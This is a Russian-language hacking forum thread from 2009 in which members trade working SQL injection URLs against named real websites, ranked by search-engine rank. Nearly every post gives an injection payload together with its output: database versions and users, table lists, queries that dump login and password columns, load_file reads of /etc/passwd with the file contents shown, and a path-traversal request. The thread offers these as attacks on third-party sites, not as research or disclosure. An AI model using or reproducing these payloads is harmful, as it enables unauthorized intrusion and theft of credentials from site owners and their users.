HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.09.2009, 13:56
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами: 8954306

Репутация: 1588
По умолчанию

aveseica.com --- PR=1
http://www.aveseica.com/links.php?id=1+anD+1=9+union+select+1,version()
version = 5.0.27
user = avesseica@localhost
database - avesseica
table - login (id, login, pass, acesso)

http://www.aveseica.com/links.php?id=1+anD+1=9+union+select+1,conCAt(0x3a, id,0x3a,login,0x3a,pass,0x3a,acesso)+from+login/*
 
Ответить с цитированием

  #2  
Старый 05.09.2009, 15:24
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами: 9204308

Репутация: 256
По умолчанию

Цитата:
_ttp://www.macforge.net/projects.php?cat=-1+union+select+1,group_concat(table_name+separator +0x0a),3+from+information_schema.tables+where+tabl e_schema+not+in+('information_schema')+--+
MacTech25-2006 MacTech25-2007 MacTech25_2008 access accesslog actions actions_aid authmap batch blocks blocks_roles boxes cache cache_block cache_content cache_filter cache_form cache_menu cache_page cache_update cache_views comments contact content_field_issue content_group content_group_fields content_node_field content_node_field_instan

Цитата:
_ttp://www.macforge.net/projects.php?cat=-1+union+select+1,load_file('/etc/passwd'),3+--+
## # User Database # # Note that this file is consulted directly only when the system is running # in single-user mode. At other times this information is provided by # Open Directory. # # This file will not be consulted for authentication unless the BSD local node # is enabled via /Applications/Utilities/Directory Utility.app # # See the DirectoryService(8) man page for additional information about # Open Directory. ## nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false root:*:0:0:System Administrator:/var/root:/bin/sh daemon:*:1:1:System Services:/var/root:/usr/bin/false _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico _lp:*:26:26:Printing Services:/var/spool/cups:/usr/bin/false _postfix:*:27:27:Postfix Mail Server:/var/spool/postfix:/usr/bin/false _mcxalr:*:54:54:MCX AppLaunch:/var/empty:/usr/bin/false _pcastagent:*:55:55:Podcast Producer Agent:/var/pcast/agent:/usr/bin/false _pcastserver:*:56:56:Podcast Producer Server:/var/pcast/server:/usr/bin/false _serialnumberd:*:58:58:Serial Number Daemon:/var/empty:/usr/bin/false _devdocs:*:59:59eveloper Documentation:/var/empty:/usr/bin/false _sandbox:*:60:60:Seatbelt:/var/empty:/usr/bin/false _mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false _ard:*:67:67:Apple Remote Desktop:/var/empty:/usr/bin/false _www:*:70:70:World Wide Web Server:/Library/WebServer:/usr/bin/false _eppc:*:71:71:Apple Events User:/var/empty:/usr/bin/false _cvs:*:72:72:CVS Server:/var/empty:/usr/bin/false _svn:*:73:73:SVN Server:/var/empty:/usr/bin/false _mysql:*:74:74:MySQL Server:/var/empty:/usr/bin/false _sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false _qtss:*:76:76:QuickTime Streaming Server:/var/empty:/usr/bin/false _cyrus:*:77:6:Cyrus Administrator:/var/imap:/usr/bin/false _mailman:*:78:78:Mailman List Server:/var/empty:/usr/bin/false _appserver:*:79:79:Application Server:/var/empty:/usr/bin/false _clamav:*:82:82:ClamAV Daemon:/var/virusmails:/usr/bin/false _amavisd:*:83:83:AMaViS Daemon:/var/virusmails:/usr/bin/false _jabber:*:84:84:Jabber XMPP Server:/var/empty:/usr/bin/false _xgridcontroller:*:85:85:Xgrid Controller:/var/xgrid/controller:/usr/bin/false _xgridagent:*:86:86:Xgrid Agent:/var/xgrid/agent:/usr/bin/false _appowner:*:87:87:Application Owner:/var/empty:/usr/bin/false _windowserver:*:88:88:WindowServer:/var/empty:/usr/bin/false _spotlight:*:89:89:Spotlight:/var/empty:/usr/bin/false _tokend:*:91:91:Token Daemon:/var/empty:/usr/bin/false _securityagent:*:92:92:SecurityAgent:/var/empty:/usr/bin/false _calendar:*:93:93:Calendar:/var/empty:/usr/bin/false _teamsserver:*:94:94:TeamsServer:/var/teamsserver:/usr/bin/false _update_sharing:*:95:-2:Update Sharing:/var/empty:/usr/bin/false _installer:*:96:-2:Installer:/var/empty:/usr/bin/false _atsserver:*:97:97:ATS Server:/var/empty:/usr/bin/false _unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
 
Ответить с цитированием

  #3  
Старый 05.09.2009, 15:49
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
С нами: 9318329

Репутация: 394
По умолчанию

Код:
http://www.missoulacvb.org/detail.php?id=-96+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,20/*
Database Version: 5.0.32-Debian_7etch10
Database name: missoulacvb_directory
User name: missoulacvb_dir@king.metasecure.net

--------------------------------------------------------------------------------------------------

Код:
http://www.thevalleypost.com/article.php?id=-536+union+select+1,2,unhex(hex(concat_ws(0x3a,username,password))),4,5,6,7,8,9,0,11,12+from+users/*
Database Version: 4.1.14
Database name: thevalleypost
User name: thevalleypost@localhost

Последний раз редактировалось Skofield; 05.09.2009 в 17:05..
 
Ответить с цитированием

  #4  
Старый 05.09.2009, 17:49
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
С нами: 8954306

Репутация: 1588
По умолчанию

commercial-russia.ru - ТИЦ=10 + .ru
http://www.commercial-russia.ru/links.php?id=1/**/aNd/**/substring(version(),1,1)=5
ветка = 5
 
Ответить с цитированием

  #5  
Старый 05.09.2009, 18:15
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

http://www.crjs.ru/en/news/news.php?newsid=-141+union+select+1,2,3,4,5,6,7,8,9,id+from+admin_t otal+--+

http://www.autoconmotorsports.com/news/News.php?NewsID=-55+union+select+1,2,3,4,5,6,7,8,9+/*+

http://anthenv.web.arizona.edu/Officers.php?Role=Treasurer&Bio=../../../../etc/passwd

http://www.nuclearblastusa.com/nb/v2/news/news.php?newsID=-625+union+select+1,2,3,4,5,6,7,8+/*+

http://www.jeffbucknum.com/news/News.php?NewsID=-20+union+select+1,2,3,4,5,6,7,8,9+/*+

http://www.farmaks.ru/rus/news/news.php?NewsID=-53+union+select+1,2,3,4+/*+

Последний раз редактировалось jokester; 05.09.2009 в 18:23.. Причина: mek-kuechen.ru groundstarresources.com БОЯНЫ
 
Ответить с цитированием

  #6  
Старый 05.09.2009, 19:45
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
С нами: 9318329

Репутация: 394
По умолчанию

Код:
http://niet.com/message_info.php?id=273362+union+select+1,2,3,4,5,load_file(0x2f6574632f706173737764),7,8+from+mysql.user/*
Database Version: 5.0.45-log
Database name: nietmail
User name: john@lighttpd

--------------------------------------------------------------------------------------------

PR 6
Код:
http://www.shambhala.org/teachings/view.php?id=-131'+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,21/*
Database Version: 5.0.45
Database name: shambhalaweb
User name: shambhalaweb@localhost

Последний раз редактировалось Skofield; 05.09.2009 в 20:31..
 
Ответить с цитированием

  #7  
Старый 05.09.2009, 21:20
diGriz
Участник форума
Регистрация: 11.10.2006
Сообщений: 134
С нами: 10305836

Репутация: 235
По умолчанию

[PR=4]
Код:
http://www.play-pb.com/sh_new.php?id=-244+union+select+1,2,concat_ws(0x3b,database(),version(),user()),4--
playpb_marikoplaypb;4.1.22-standard;playpb@localhost
 
Ответить с цитированием

  #8  
Старый 05.09.2009, 23:10
ANUBI$
Участник форума
Регистрация: 16.01.2009
Сообщений: 115
С нами: 9113518

Репутация: 279
По умолчанию

http://yugday.ru/stat/links.php?ID=1+anD+substring(version(),1,1)=4
версия 4
ТИЦ: 20
 
Ответить с цитированием

  #9  
Старый 05.09.2009, 23:19
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
С нами: 9230726

Репутация: 454
По умолчанию

PGSQL

Цитата:
http://fotokala.ee/
baas.php?aktsioon=tegija&p2ring=&pilt=1+and+1=cast ((select+current_user||chr(58)||version())+as+int)
kala:PostgreSQL 8.1.11 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21)
 
Ответить с цитированием

  #10  
Старый 06.09.2009, 01:03
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
С нами: 9431076

Репутация: 229
По умолчанию

slb.ru PR 5 ТИЦ 275

Код:
http://slb.ru/page.php?code=-15+union+select   +1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14+--+
Version: 4.1.22
Database: slb_sql
User: slb@localhost

mayprint.ru

Код:
http://www.mayprint.ru/news_page.php?code=-20+UNION+SELECT+1,2,3,unhex(hex(concat_ws(0x3a,version(),database(),user()))),5+--+
Version: 4.1.11-standard
Database: db_mayprint
User: mayprint@localhost.localdomain

burenki.ru

Код:
http://www.burenki.ru/view_news.php?id=-5+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5+--+
Version: 5.0.67-log
Database: u30138
User: u30138@10.10.223.209

Последний раз редактировалось nemaniak; 06.09.2009 в 12:17..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.